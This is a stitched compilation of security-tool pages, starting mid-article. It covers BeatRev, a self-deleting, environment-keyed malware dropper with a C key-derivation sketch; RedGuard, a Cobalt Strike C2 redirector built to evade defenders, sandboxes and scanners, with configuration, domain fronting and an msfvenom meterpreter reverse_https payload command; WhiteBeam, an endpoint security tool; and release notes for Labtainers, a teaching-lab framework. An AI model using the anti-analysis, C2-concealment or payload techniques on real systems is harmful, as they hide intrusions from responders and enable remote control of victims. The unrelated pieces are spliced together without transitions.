  2. When you are talking about legal, sanctioned Red Team work there isn't really a need to try and frustrate or defeat a reverse engineer because the activity should have been deconflicted long before it reaches that stage.

Nonetheless it was an interesting thought experiment and I had a few colleagues who DO know about malware analysis that I could bounce ideas off of. It seemed a challenge of a whole different magnitude compared to AV/EDR evasion and one I decided to take a stab at.

Premise

My initial premise was that the malware, the first time it was run, would somehow "key" itself to that victim machine; any subsequent attempts to run it would evaluate something in the target environment and compare it against a value stored in the malware. If those two factors matched, it executes as expected. If they do not (as in the case where the sample has been transferred to a malware analyst's sandbox), the malware deletes itself (once again heavily leaning on the work of LloydLabs and his delete-self-poc).

This "key" must be something "unique" to the victim computer. Ideally it will be a combination of several pieces of information, and then further obfuscated. As an example, we could gather the hostname of the computer as well as the amount of RAM installed; these two values can then be concatenated (e.g. Client018192MB) and then hashed using a user-defined function to produce a number (e.g. 5343823956).

There are a ton of choices in what information to gather, but thought should be given as to what values a Blue Teamer could easily spoof; a MAC address for example may seem like an attractive "unique" identifier for a victim, however MAC addresses can easily be set manually in order for a Reverse Engineer to match their sandbox to the original victim. Ideally the values chosen and enumerated will be one that are difficult for a reverse engineer to replicate in their environment.

With some self-deletion magic, the malware could read itself into a buffer, locate a placeholder variable and replace it with this number, delete itself, and then write the modified malware back to disk in the same location. Combined with an if/else statement in Main, the next time the malware runs it will detect that it has been ran previously and then go gather the hostname and amount of RAM again in order to produce the hashed number. This would then be evaluated against the number stored in the malware during the first run (5343823956). If it matches (as is the case if the malware is running on the same machine as it originally did), it executes as expected however if a different value is returned it will again call the self-delete function in order to remove itself from disk and protect the author from the malware analyst.

This seemed like a fine idea in theory until I spoke with a colleague who has real malware analysis and reverse engineering experience. I was told that a reverse engineer would be able to observe the conditional statement in the malware (if ValueFromFirstRun != GetHostnameAndRAM()), and seeing as the expected value is hard-coded on one side of the conditional statement, simply modify the registers to contain the expected value thus completely bypassing the entire protection mechanism.

This new knowledge completely derailed the thought experiment and seeing as I didn't really have a use for a capability like this in the first place, this is where the project stopped for ~6 months.

Overview

This project resurfaced a few times over the intervening 6 months but each time was little more than a passing thought, as I had gained no new knowledge of reversing/malware analysis and again had no need for such a capability. A few days ago the idea rose again and while still neither of those factors have really changed, I guess I had a little bit more knowledge under my belt and couldn't let go of the idea this time.

With the aforementioned problem regarding hard-coding values in mind, I ultimately decided to go for a multi-stage design. I will refer to them as Stage0, Stage1, and Stage2.

Stage0: Setup. Ran on initial infection and deleted afterwards

Stage1: Runner. Ran each subsequent time the malware executes

Stage2: Payload. The malware you care about protecting. Spawns a process and injects shellcode in order to return a Beacon.

Lifecycle

Stage0

Stage0 is the fresh executable delivered to target by the attacker. It contains Stage1 and Stage2 as AES encrypted byte arrays; this is done to protect the malware in transit, or should a defender somehow get their hands on a copy of Stage0 (which shouldn't happen). The AES Key and IV are contained within Stage0 so in reality this won't protect Stage1 or Stage2 from a competent Blue Teamer.

Stage0 performs the following actions:

  1. Sandbox evasion.
  2. Delete itself from disk. It is still running in memory.
  3. Decrypts Stage1 using stored AES Key/IV and writes to disk in place of Stage0.
  4. Gathers the processor name and the Microsoft ProductID.
  5. Hashes this value and then pads it to fit a 16 byte AES key length. This value reversed serves as the AES IV.
  6. Decrypts Stage2 using stored AES Key/IV.
  7. Encrypts Stage2 using new victim-specific AES Key/IV.
  8. Writes Stage2 to disk as an alternate data stream of Stage1.

At the conclusion of this sequence of events, Stage0 exits. Because it was deleted from disk in step 2 and is no longer running in memory, Stage0 is effectively gone; without prior knowledge of this technique, the rest of the malware lifecycle will be a whole lot more confusing than it already is.

In step 4 the processor name and Microsoft ProductID are gathered; the ProductID is retrieved from the Registry, and this value can be manually modified, which presents an easy opportunity for a Blue Teamer to match their sandbox to the target environment. Depending on what environmental information is gathered, this can become easier or more difficult.
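
A hedged sketch of what gathering the ProductId and shaping a hash into a 16-byte key (with the reversed copy used as the IV, per steps 4-5 above) could look like is shown below; this is an illustration of the described steps, not BeatRev's actual source:

#include <windows.h>
#include <stdio.h>
#include <string.h>

/* Read the Microsoft ProductId from the registry (one of the two values the
   text says is gathered; note a defender can modify this value). */
static int ReadProductId(char *out, DWORD outLen)
{
    HKEY key;
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE,
                      "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
                      0, KEY_READ, &key) != ERROR_SUCCESS)
        return 0;
    LONG rc = RegQueryValueExA(key, "ProductId", NULL, NULL,
                               (LPBYTE)out, &outLen);
    RegCloseKey(key);
    return rc == ERROR_SUCCESS;
}

/* Hash the gathered string, render it as 16 characters (truncated/padded),
   and reverse the key bytes to form the IV. */
static void DeriveKeyIv(const char *gathered, unsigned char key[16],
                        unsigned char iv[16])
{
    unsigned long long h = 5381;
    for (const char *p = gathered; *p; p++) h = h * 33 + (unsigned char)*p;

    char padded[17];
    snprintf(padded, sizeof(padded), "%016llu", h);
    memcpy(key, padded, 16);
    for (int i = 0; i < 16; i++) iv[i] = key[15 - i];  /* reversed key as IV */
}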

Stage1

Stage1 was dropped by Stage0 and exists in the same exact location as Stage0 did (to include the name). Stage2 is stored as an ADS of Stage1. When the attacker/persistence subsequently executes the malware, they are executing Stage1.

Stage1 performs the following actions:

  1. Sandbox evasion.
  2. Gathers the processor name and the Microsoft ProductID.
  3. Hashes this value and then pads it to fit a 16 byte AES key length. This value reversed serves as the AES IV.
  4. Reads Stage2 from Stage1's ADS into memory.
  5. Decrypts Stage2 using the victim-specific AES Key/IV.
  6. Checks first two bytes of decrypted Stage2 buffer; if not MZ (unsuccessful decryption), delete Stage1/Stage2, exit.
  7. Writes decrypted Stage2 back to disk as ADS of Stage1
  8. Calls CreateProcess on Stage2. If this fails (unsuccessful decryption), delete Stage1/Stage2, exit.
  9. Sleeps 5 seconds to allow Stage2 to execute + exit so it can be overwritten.
  10. Encrypts Stage2 using victim-specific AES Key/IV
  11. Writes encrypted Stage2 back to disk as ADS of Stage1.

Note that Stage2 MUST exit in order for it to be overwritten; the self-deletion trick does not appear to work on files that are already ADS's, as the self-deletion technique relies on renaming the primary data stream of the executable. Stage2 will ideally be an inject or spawn+inject executable.

There are two points at which Stage1 could detect that it is not being run on the same victim and delete itself/Stage2 in order to protect the threat actor. The first is the check for the executable header after decrypting Stage2 using the gathered environmental information; in theory this step could be bypassed by a reverse engineer, but it is a good first check. The second protection point is the result of the CreateProcess call - if it fails because Stage2 was not properly decrypted, the malware is similarly deleted. The result of this call could also be modified to prevent deletion by the reverse engineer, however this doesn't change the fact that Stage2 is encrypted and inaccessible.

Stage2

Stage2 is the meat and potatoes of the malware chain; It is a fully fledged shellcode runner/piece of malware itself. By encrypting and protecting it in the way that we have, the actions of the end state malware are much better obfuscated and protected from reverse engineers and malware analysts. During development I used one of my existing shellcode runners containing CobaltStrike shellcode, but this could be anything the attacker wants to run and protect.

Impact, Mitigation, and Further Work

So what is actually accomplished with a malware lifecycle like this? There are a few interesting quirks to talk about.

Alternate data streams are a feature unique to NTFS file systems; this means that most ways of transferring the malware after initial infection will strip and lose Stage2 because it is an ADS of Stage1. Special care would have to be taken to transfer the sample in a way that preserves Stage2, as without it a lot of reverse engineers and malware analysts are going to be very confused as to what is happening. RAR archives are able to preserve ADS's, and tools like 7Z and PeaZip can extract files and their ADS's.

As previously mentioned, by the time malware using this lifecycle hits a Blue Teamer it should be at Stage1; Stage0 has come and gone, and Stage2 is already encrypted with the environmental information gathered by stage 0. Not knowing that Stage0 even existed will add considerable uncertainty to understanding the lifecycle and decrypting Stage2.

In theory (because again I have no reversing experience), Stage1 should be able to be reversed (after the Blue Teamer rolls through a few copies of it because it keeps deleting itself) and the information that Stage1 gathers from the target system should be able to be identified. Provided a well-orchestrated response, Blue Team should be able to identify the victim that the malware came from, go gather that information from it, and feed it into the program so that it may be transformed appropriately into the AES Key/IV that decrypts Stage2. There are a lot of "ifs" in there however, related to the relative skill of the reverse engineer as well as the victim machine being available for that information to be recovered.

Application Whitelisting would significantly frustrate this lifecycle. Stage0/Stage1 may be able to be side loaded as a DLL, however I suspect that Stage2 as an ADS would present some issues. I do not have an environment to test malware against AWL nor have I bothered porting this all to DLL format so I cannot say. I am sure there are creative ways around these issues.

I am also fairly confident that there are smarter ways to run Stage2 than dropping to disk and calling CreateProcess; Either manually mapping the executable or using a tool like Donut to turn it into shellcode seem like reasonable ideas.

Code and binary

During development I created a Builder application that Stage1 and Stage2 may be fed to in order to produce a functional Stage0; this will not be provided however I will be providing most of the source code for stage1 as it is the piece that would be most visible to a Blue Teamer. Stage0 will be excluded as an exercise for the reader, and stage2 is whatever standalone executable you want to run+protect. This POC may be further researched at the effort and discretion of able readers.

I will be providing a compiled copy of this malware as Dropper64.exe. Dropper64.exe is compiled for x64. Dropper64.exe is Stage0; it contains Stage1 and Stage2. On execution, Stage1 and Stage2 will drop to disk but will NOT automatically execute; you must run Dropper64.exe (now Stage1) again. Stage2 is an x64 version of calc.exe. I am including this for any Blue Teamers who want to take a look at this, but keep in mind that in an incident response scenario, 99% of the time you will be getting Stage1/Stage2; Stage0 will be gone.

Conclusion

This was an interesting pet project that ate up a long weekend. I'm sure it would be a lot more advanced/more complete if I had experience in a debugger and disassembler, but you do the best with what you have. I am eager to hear from Blue Teamers and other Malware Devs what they think. I am sure I have over-complicatedly re-invented the wheel here given what actual APT's are doing, but I learned a few things along the way. Thank you for reading!



RedGuard - C2 Front Flow Control Tool, Can Avoid Blue Teams, AVs, EDRs Check


0x00 Introduction

Tool introduction

RedGuard is a derivative work of C2 facility pre-flow control technology. It has a lighter design, efficient flow interaction, and reliable compatibility with Go language development. The core problem it solves is, in the face of increasingly complex red and blue attack and defense drills, giving the attack team a better C2 infrastructure concealment scheme: giving the interactive traffic of the C2 facility a flow control function, intercepting "malicious" analysis traffic, and better completing the entire attack mission.

RedGuard is a C2 facility pre-flow control tool that can evade checks by Blue Teams, AVs, EDRs, and cyberspace search engines.


Application scenarios

  • During the offensive and defensive drills, the defender analyzes and traces the source of C2 interaction traffic according to the situational awareness platform
  • Identify and prevent malicious analysis of Trojan samples in cloud sandbox environment based on JA3 fingerprint library
  • Block malicious requests to implement replay attacks and achieve the effect of confusing online
  • In the case of specifying the IP of the online server, the request to access the interactive traffic is restricted by means of a whitelist
  • Prevent the scanning and identification of C2 facilities by cyberspace mapping technology, and redirect or intercept the traffic of scanning probes
  • Supports pre-flow control for multiple C2 servers, and can achieve the effect of domain front-end, load balancing online, and achieve the effect of concealment
  • Able to perform regional host online restriction according to the attribution of IP address by requesting IP reverse lookup API interface
  • Resolve strong features of staged checksum8 rule path parsing without changing the source code.
  • Analyze blue team tracing behavior through interception logs of target requests, which can be used to track peer connection events/issues
  • It has the function of customizing the time period for the legal interaction of the sample to realize the function of only conducting traffic interaction during the working time period
  • Malleable C2 Profile parser capable of validating inbound HTTP/S requests strictly against malleable profile and dropping outgoing packets in case of violation (supports Malleable Profiles 4.0+)
  • Built-in blacklist of IPV4 addresses for a large number of devices, honeypots, and cloud sandboxes associated with security vendors to automatically intercept redirection request traffic
  • SSL certificate information and redirect URLs that can interact with samples through custom tools to circumvent the fixed characteristics of tool traffic
  • ..........

0x01 Install

You can directly download and use the compiled version, or you can download the go package remotely for independent compilation and execution.

git clone https://github.com/wikiZ/RedGuard.git
cd RedGuard
# You can also use upx to compress the compiled file size
go build -ldflags "-s -w" -trimpath
# Give the tool executable permission and perform initialization operations
chmod +x ./RedGuard&&./RedGuard

0x02 Configuration Description

initialization

As shown in the figure below, first grant executable permissions to RedGuard and perform initialization operations. The first run will generate a configuration file in the current user directory to achieve flexible function configuration. Configuration file name: .RedGuard_CobaltStrike.ini.


Configuration file content:


The configuration options of cert are mainly for the configuration information of the HTTPS traffic exchange certificate between the sample and the C2 front-end facility. The proxy is mainly used to configure the control options in the reverse proxy traffic. The specific use will be explained in detail below.

The SSL certificate used in the traffic interaction will be generated in the cert-rsa/ directory under the directory where RedGuard is executed. You can start and stop the basic functions of the tool by modifying the configuration file (the serial number of the certificate is generated according to the timestamp, so don't worry about being associated through this feature). If you want to use your own certificate, just rename the files to ca.crt and ca.key.

openssl x509 -in ca.crt -noout -text


Random TLS JARM fingerprints are updated each time RedGuard is started to prevent this from being used to authenticate C2 facilities.


If you are using your own certificate, modify the HasCert parameter in the configuration file to true; this prevents communication problems caused by the JARM randomization selecting a CipherSuites configuration that is incompatible with the custom certificate.

# Whether to use the certificate you have applied for true/false
HasCert = false

RedGuard Usage

root@VM-4-13-ubuntu:~# ./RedGuard -h

Usage of ./RedGuard:
  -DropAction string
        RedGuard interception action (default "redirect")
  -EdgeHost string
        Set Edge Host Communication Domain (default "*")
  -EdgeTarget string
        Set Edge Host Proxy Target (default "*")
  -HasCert string
        Whether to use the certificate you have applied for (default "true")
  -allowIP string
        Proxy Requests Allow IP (default "*")
  -allowLocation string
        Proxy Requests Allow Location (default "*")
  -allowTime string
        Proxy Requests Allow Time (default "*")
  -common string
        Cert CommonName (default "*.aliyun.com")
  -config string
        Set Config Path
  -country string
        Cert Country (default "CN")
  -dns string
        Cert DNSName
  -host string
        Set Proxy HostTarget
  -http string
        Set Proxy HTTP Port (default ":80")
  -https string
        Set Proxy HTTPS Port (default ":443")
  -ip string
        IPLookUP IP
  -locality string
        Cert Locality (default "HangZhou")
  -location string
        IPLookUP Location (default "风起")
  -malleable string
        Set Proxy Requests Filter Malleable File (default "*")
  -organization string
        Cert Organization (default "Alibaba (China) Technology Co., Ltd.")
  -redirect string
        Proxy redirect URL (default "https://360.net")
  -type string
        C2 Server Type (default "CobaltStrike")
  -u    Enable configuration file modification

P.S. You can use the parameter command to modify the configuration file. Of course, I think it may be more convenient to modify it manually with vim.

0x03 Tool usage

basic interception

If you directly access the port of the reverse proxy, the interception rule will be triggered. Here you can see the root directory of the client request through the output log, but because the request does not carry the required credentials (that is, the correct HOST request header), the basic interception rule is triggered and the traffic is redirected to https://360.net

Output is shown in the foreground here to demonstrate the effect; in actual use RedGuard can be run in the background with nohup ./RedGuard &.


{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}

As the snippet above shows, 360.net is proxied to local port 8080 over HTTP, while 360.com points to local port 4433 over HTTPS. When bringing implants online later, make sure the listener protocol matches what is configured here and that the corresponding HOST request header is set.
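A quick way to verify the mapping is to send requests with and without the expected HOST header. A hypothetical check (replace 127.0.0.1 with the address of your RedGuard server):

curl -vk https://127.0.0.1/                      # no matching Host header: interception rule fires
curl -vk -H "Host: 360.com" https://127.0.0.1/   # matching Host header: proxied to the C2 listener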


As shown in the figure above, for an unauthorized request the response we receive is the content returned by the redirect target site.

interception method

In the basic interception case above, the default method is used: illegal traffic is intercepted by redirection. By modifying the configuration file we can change both the interception method and the redirect target URL. The alternative method is less a redirect than a hijack or clone: the response status code returned is 200, and the response body is fetched from another website so that the cloned/hijacked site is mimicked as closely as possible.

Invalid requests can be handled according to three strategies:

  • reset: Terminate the TCP connection immediately.
  • proxy: Get a response from another website to mimic the cloned/hijacked website as closely as possible.
  • redirect: redirect to the specified website and return HTTP status code 302; any website can be used as the redirect target.
# RedGuard interception action: redirect / reset / proxy (hijack HTTP response)
drop_action = proxy
# URL to redirect to
Redirect = https://360.net

The Redirect = URL entry in the configuration file points to the site to hijack. RedGuard supports hot reloading: while the tool runs in the background via nohup, the configuration file can still be modified and the changes take effect in real time.

./RedGuard -u --drop true

Note that when modifying the configuration file from the command line, the -u option must not be omitted, otherwise the configuration file will not be updated. To restore the default configuration, simply run ./RedGuard -u.

Another interception method is DROP, which closes the HTTP connection without returning any response and is enabled by setting DROP = true. The interception effect is as follows:


As can be seen, the C2 front-end flow control closes the connection for illegal requests without returning any HTTP response code. Against cyberspace mapping probes, the DROP method can make the open port appear closed; the specific effect is shown in the case analysis below.
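For reference, a minimal configuration snippet enabling this mode (assuming the same .ini convention as the other options shown in this document):

# Close the connection for illegal requests instead of responding
DROP = true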

Proxy port modification

This one is straightforward: the following two parameters in the configuration file change the reverse proxy ports. It is recommended to keep the defaults unless they conflict with ports already in use on the server. If you do change them, note that the leading : in the parameter value must not be omitted.

# HTTPS Reverse proxy port
Port_HTTPS = :443
# HTTP Reverse proxy port
Port_HTTP = :80

RedGuard logs

Blue-team tracing behavior can be analyzed through the interception log of target requests, which can also be used to track related connection events and problems. The log file is generated in the directory where RedGuard is running, file name: RedGuard.log.


RedGuard Obtain the real IP address

This section describes how to configure RG so that the C2 receives the real IP address of each request. Simply add the following to the profile of the C2 device; the target's real IP is then taken from the X-Forwarded-For request header.

http-config {
set trust_x_forwarded_for "true";
}

Request geographic restrictions

Take AllowLocation = Jinan,Beijing as an example. Note that RedGuard provides two IP-geolocation APIs, one for users in China and one for users overseas, and the API is chosen dynamically: if the target is in China, enter the region names in Chinese, otherwise enter English place names. Domestic users are advised to use Chinese names, which gives the best balance of geolocation accuracy and API response time.

P.S. Domestic users should not mix languages as in AllowLocation = Jinan,beijing. It makes little sense, because the first character of the parameter value determines which API is used!

# IP geolocation restriction, example: AllowLocation = ๅฑฑไธœ,ไธŠๆตท,ๆญๅทž or shanghai,beijing
AllowLocation = *


Before deciding to restrict by region, you can manually look up an IP address's location with the following commands.

./RedGuard --ip 111.14.218.206
./RedGuard --ip 111.14.218.206 --location shandong # Use overseas API to query

Here we allow only requests from the Shandong region to come online.


Legit traffic:


Request from a disallowed region:


Geographic restrictions are particularly practical in current offensive and defensive exercises. The targets in provincial and municipal protection-network drills are basically located in designated areas, so traffic requested from other areas can simply be ignored. RedGuard can restrict more than a single region: multiple allowed regions can be specified by province and city, and traffic requested from all other regions is intercepted.

Blocking based on whitelist

In addition to RedGuard's built-in blacklist of security-vendor IPs, access can also be restricted with a whitelist. In fact, for web-style management I suggest whitelisting the IP addresses allowed to come online; multiple addresses can be listed, separated by commas.

# Whitelist list example: AllowIP = 172.16.1.1,192.168.1.1
AllowIP = 127.0.0.1


As shown in the figure above, only 127.0.0.1 is allowed to come online, so request traffic from any other IP is intercepted.

Block based on time period

This feature is more interesting. Setting the following parameter values in the configuration file means the flow-control facility only allows traffic between 8:00 am and 9:00 pm. The intended scenario is that we allow communication with the C2 only during the designated attack window and stay silent at all other times. It also lets the red team get a good night's sleep, without worrying that a bored night-shift blue teamer will analyze your Trojan and wake you up to something indescribable, hahaha.

# Limit the time of requests example: AllowTime = 8:00 - 16:00
AllowTime = 8:00 - 21:00


Malleable Profile

RedGuard uses the Cobalt Strike Malleable C2 profile. It parses the relevant sections of the provided malleable profile to understand the traffic contract, passes only the inbound requests that satisfy it, and misleads everything else. Sections such as http-stager, http-get and http-post, with their corresponding URIs, headers, User-Agent and so on, are used to distinguish legitimate beacon requests from irrelevant Internet noise and out-of-spec IR/AV/EDR packets.

# C2 Malleable File Path
MalleableFile = /root/cobaltstrike/Malleable.profile
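For context, a minimal http-get block of the kind RedGuard matches requests against (the URI and header values here are placeholders for illustration, not the recommended profile):

http-get {
    set uri "/api/v1/updates";
    client {
        header "Accept" "*/*";
        metadata {
            base64;
            header "Cookie";
        }
    }
}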


The profile written by ้ฃŽ่ตท is recommended:

https://github.com/wikiZ/CobaltStrike-Malleable-Profile

0x04 Case Study

Cyberspace Search Engine

As shown in the figure below, when the interception rule is set to DROP, the mapping-system probe requests the / directory of our reverse proxy port several times. In theory the probe's request packets are faked to look like normal traffic, but because their characteristics do not meet RedGuard's release requirements, every attempt is answered by simply closing the HTTP connection. The end result displayed on the mapping platform is that the reverse proxy port is not open.


The traffic in the figure below shows what happens when the interception rule is set to Redirect: once the mapping probe receives a response, it keeps scanning our directories with randomized User-Agents, which appears consistent with normal traffic, yet every request is still blocked.


Mapping platform - effect of the hijack-response (proxy) interception mode:


Mapping platform - effect of the redirect interception mode:


Domain fronting

RedGuard supports domain fronting, and in my view it can take two forms. One is the traditional approach: point the back-to-origin address of a site-wide CDN acceleration at our reverse proxy port. On top of ordinary domain fronting this adds flow control, and illegitimate traffic can be redirected to a specified URL to make the setup look more realistic. Note that the HTTPS HOST header configured in RedGuard must match the domain name used for the site-wide acceleration.


For individual operations I suggest the method above; for team operations, a self-built "domain fronting" setup can also be used.


In a self-built domain-fronting setup, keep the reverse proxy ports on the multiple nodes consistent, and have the HOST header consistently point to the listening port of the real back-end C2 server. This hides the real C2 server well, and the reverse proxy servers only need to expose the proxy port through their firewall configuration.


This can be achieved with multiple node servers, configuring the IPs of our nodes as the HTTPS callback addresses in the CS listener.

Edge Node

RedGuard 22.08.03 added edge-host settings: a custom domain name for interaction with the intranet host, while the edge host itself interacts through a domain-fronting CDN node. The information exchanged by the two hosts is asymmetric, which makes tracing the source and inspection more difficult.


CobaltStrike

One caveat with the above method is that the firewall of the actual C2 server cannot simply block everything, because the load-balanced requests from the reverse proxy arrive from the cloud vendor's IP addresses.

For an individual operator, an interception policy can instead be set on the cloud server's own firewall.


Then set the address pointed to by the proxy to https://127.0.0.1:4433.

{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}

Because the basic verification is based on the HTTP HOST request header, the HTTP traffic looks the same as with domain fronting, but the cost is lower: only one cloud server is needed.


For the listener settings, the callback port is the RedGuard reverse proxy port, while the bind port is the port the local machine actually listens on.

Metasploit

Generate the Trojan

$ msfvenom -p windows/meterpreter/reverse_https LHOST=vpsip LPORT=443 HttpHostHeader=360.com \
-f exe -o ~/path/to/payload.exe

Of course, in a domain-fronting scenario you can also set LHOST to any domain name on the vendor's CDN; just make sure HttpHostHeader matches the RedGuard configuration.

setg OverrideLHOST 360.com
setg OverrideLPORT 443
setg OverrideRequestHost true

It is important to note that OverrideRequestHost must be set to true. This is due to a quirk in how Metasploit handles incoming HTTP/S requests by default when generating configuration for staged payloads. By default, Metasploit uses the incoming request's Host header value (if present) for second-stage configuration instead of the LHOST parameter. The stager would therefore be configured to send requests directly to your hidden domain name, because CloudFront passes your internal domain in the Host header of forwarded requests, which is exactly what we want to avoid. With OverrideRequestHost set, Metasploit ignores the incoming Host header and instead uses the LHOST configuration value, which points to the fronted CloudFront domain.

The listener port should match the local port that RedGuard actually forwards traffic to.
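Putting it together, a hypothetical handler setup (the local port 4433 is assumed to match the host-mapping example shown earlier):

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 4433
set OverrideLHOST 360.com
set OverrideLPORT 443
set OverrideRequestHost true
run -j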


RedGuard received the request:


0x05 Loading

Thank you for your support. RedGuard will continue to be improved and updated, and I hope it becomes known to more security practitioners. The tool's design draws on the ideas of RedWarden.

**We welcome everyone to put forward their needs; RedGuard will continue to grow and improve around them!**

Articles by the developer ้ฃŽ่ตท: https://www.anquanke.com/member.html?memberId=148652

Author featured in the Arsenal ("weapon spectrum") of the 2022 KCon hacker conference

Presented the "C2 Front Flow Control" topic at the Advanced Offensive and Defensive Forum of the 10th ISC Internet Security Conference

https://isc.n.cn/m/pages/live/index?channel_id=iscyY043&ncode=UR6KZ&room_id=1981905&server_id=785016&tab_id=253

Analysis of cloud sandbox flow identification technology

https://www.anquanke.com/post/id/277431

Realization of JARM Fingerprint Randomization Technology

https://www.anquanke.com/post/id/276546

Kunyu: https://github.com/knownsec/Kunyu

้ฃŽ่ตทไบŽ้’่ไน‹ๆœซ๏ผŒๆตชๆˆไบŽๅพฎๆพœไน‹้—ดใ€‚

0x06 Community

If you have any questions or requirements, you can open an issue on the project or contact the tool author by adding them on WeChat.




WhiteBeam - Transparent Endpoint Security


Transparent endpoint security

Features

  • Block and detect advanced attacks
  • Modern audited cryptography: RustCrypto for hashing and encryption
  • Highly compatible: Development focused on all platforms (incl. legacy) and architectures
  • Source available: Audits welcome
  • Reviewed by security researchers with combined 100+ years of experience

In Action

Installation

From Packages (Linux)

Distro-specific packages have not been released yet for WhiteBeam, check again soon!

From Releases (Linux)

  1. Download the latest release
  2. Ensure the release file hash matches the official hashes (How-to)
  3. Install:
    • ./whitebeam-installer install

From Source (Linux)

  1. Run tests (Optional):
    • cargo run test
  2. Compile:
    • cargo run build
  3. Install WhiteBeam:
    • cargo run install

Quick start

  1. Become root (sudo su/su root)
  2. Set a recovery secret. You'll be able to use this with whitebeam --auth to make changes to the system: whitebeam --setting RecoverySecret mask

How to Detect Attacks with WhiteBeam

Multiple guides are provided depending on your preference. Contact us so we can help you integrate WhiteBeam with your environment.

  1. Serverless guide, for passive review
  2. osquery Fleet setup guide, for passive review
  3. WhiteBeam Server setup guide, for active response

How to Prevent Attacks with WhiteBeam

WhiteBeam is experimental software. Contact us for assistance safely implementing it.
  1. Become root (sudo su/su root)
  2. Review the baseline at least 24 hours after installing WhiteBeam:
    • whitebeam --baseline
  3. Add trusted behavior to the whitelist, following the whitelisting guide
  4. Enable WhiteBeam prevention:
    • whitebeam --setting Prevention true


Labtainers - A Docker-based Cyber Lab Framework


Labtainers include more than 50 cyber lab exercises, plus tools to build your own. Import a single VM appliance or install on a Linux system, and your students are done with provisioning and administrative setup for these and future lab exercises.

  • Consistent lab execution environments and automated provisioning via Docker containers
  • Multi-component network topologies on a modestly performing laptop computer
  • Automated assessment of student lab activity and progress
  • Individualized lab exercises to discourage sharing solutions

Labtainers provide controlled and consistent execution environments in which students perform labs entirely within the confines of their computer, regardless of the Linux distribution and packages installed on the student's computer. Labtainers run on our VM appliance, or on any Linux system with Docker installed. Labtainers are also available as cloud-based VMs, e.g., on Azure as described in the Student Guide.

See the Student Guide for installation and use, and the Instructor Guide for student assessment. Developing and customizing lab exercises is described in the Designer Guide. See the Papers for additional information about the framework. The Labtainers website, and downloads (including VM appliances with Labtainers pre-installed) are at https://nps.edu/web/c3o/labtainers.
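For orientation, a minimal session might look like the following (the lab name is only an example; the commands are run from the student work directory described below):

cd scripts/labtainers-student
labtainer <labname>     # start a lab; see labtainer -h for options and keyword search
stoplab                 # stop the running lab and collect the student's artifacts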

Distribution created: 03/25/2022 09:37
Revision: v1.3.7c
Commit: 626ea075
Branch: master


Distribution and Use

Please see the licensing and distribution information in the docs/license.md file.

Guide to directories

  • scripts/labtainers-student -- the work directory for running and testing student labs. You must be in that directory to run student labs.

  • scripts/labtainers-instructor -- the work directory for running and testing automated assessment and viewing student results.

  • labs -- Files specific to each of the labs

  • setup_scripts -- scripts for installing Labtainers and Docker and updating Labtainers

  • docs -- latex source for the labdesigner.pdf, and other documentation.

  • UI -- Labtainers lab editor source code (Java).

  • headless-lite -- scripts for managing Docker Workstation and cloud instances of Labtainers (systems that do not have native X11 servers.)

  • scripts/designer -- Tools for building new labs and managing base Docker images.

  • config -- system-wide configuration settings (these are not the lab-specific configuration settings).

  • distrib -- distribution support scripts, e.g., for publishing labs to the Docker hub.

  • testsets -- Test procedures and expected results. (Per-lab drivers for SimLab are not distributed).

  • pkg-mirrors -- utility scripts for internal NPS package mirroring to reduce external package pulling during tests and distribution.

Support

Use the GitHub issue reports, or email me at mfthomps@nps.edu

Also see https://my.nps.edu/web/c3o/support1

Release notes

The standard Labtainers distribution does not include files required for development of new labs. For those, run ./update-designer.sh from the labtainer/trunk/setup_scripts directory.

The installation script and the update-designer.sh script set environment variables, so you may want to logout/login, or start a new bash shell before using Labtainers the first time.

March 23, 2022

  • Fix path to tap lock directory; was causing failure of labs using network taps
  • Update plc-traffic netmon computer to have openjfx needed for new grassmarlin in java environment
  • Speed up lab startup by avoiding chown -R, which is very slow in docker.
  • Another shot at avoiding deletion of the X11 link in container /tmp directory.
  • Fix webtrack counting of sites visited and remove live-headers goal, that tool is no longer available. Clarified some lab manual steps.

March 2, 2022

  • Add new ssh-tunnel lab (thanks GWD!)
  • Fix labedit failure to reflect X11 value set by new_lab_setup
  • Add option to not parameterize a container

February 23, 2022

  • labedit was corrupting start.config after addition of new containers
  • Incorrect path to student guide in the student README file; dynamically change for cloud configs
  • Incorrect extension to update-labtainer.sh
  • Misc guide enhancements
  • Update the ghidra lab to include version 10.1.2 of Ghidra

February 15, 2022

  • Revert Azure cloud support to provision for each student. Azure discourages sharing resources.

January 24, 2022

  • Azure cloud now uses image stored in an Azure blob instead of provisioning for each student.
  • Added support for Google Cloud.

January 19, 2022

  • Introduce Labtainers on the Azure cloud. See the Student Guide for details on how to use this.

January 3, 2022

  • Revise setuid-env lab to add better assessment; simlab testing and avoid sighup in the printenv child.
  • Fix assessment goal count directive to exclude result tag values of false.
  • Do not require labname when using gradelab -a with a grader started with the debug option.
  • Revise capinout (stdin/stdout mirroring) to handle orphaning of command process children, improved documentation and error handling.
  • Added display of progress bars of docker images being pulled when a lab is first run.
  • User feedback on progress of container initialization.
  • The pcap-lib lab was missing a notify file needed for automated assessment; Remove extraneous step from Lab Manual.

November 23, 2021

  • Disable ubuntu popup errors on test VM.
  • Fix handling of different DISPLAY variable formats.

October 22, 2021

  • Revise the tcpip lab guide to note a successful syn-flood attack is not possible. Fix its automated assessment and add SimLab scripts.
  • Change artifact file extension from zip to lab, and add a preamble to confuse GUI file managers. Students were opening the zip and submitting its guts.
  • Make the -r option to gradelab the default, add a -c option for cumulative use of grader.
  • Modify refresh_mirror to refer to the local release date to avoid frequent queries of DockerHub. Each such query counts as an image pull, and they are now trying to monetize those.

September 30, 2021

  • Change bufoverflow lab guide and grading to not expect success with ASLR turned on, assess whether it was run.
  • Error handling for web grader for cases where student lacks results.
  • Print warning when deprecated lab is run.
  • Change formatstring grading to remove unused "_leaked_secret" description and clarify value of leaked_no_scanf.
  • Also change formatstring grading to allow any name for the vulnerable executable.

September 29, 2021

  • Gradelab error handling, reduce instances of crashes due to bad zip files.
  • Limit stdout artifact files to 1MB

September 17, 2021

  • Ghidra lab guide had wrong IP address, was not remade from source.

September 14, 2021

  • Example labs for LDAP and Mariadb using SSL. Intended as templates for new labs.
  • Handle Mariadb log format
  • Add per-container parameters to limit CPU use or pin container to CPU set.
  • Labpack creation now available via a GUI (makepackui).
  • Tab completion for the labtainer, labpack and gradelab commands.
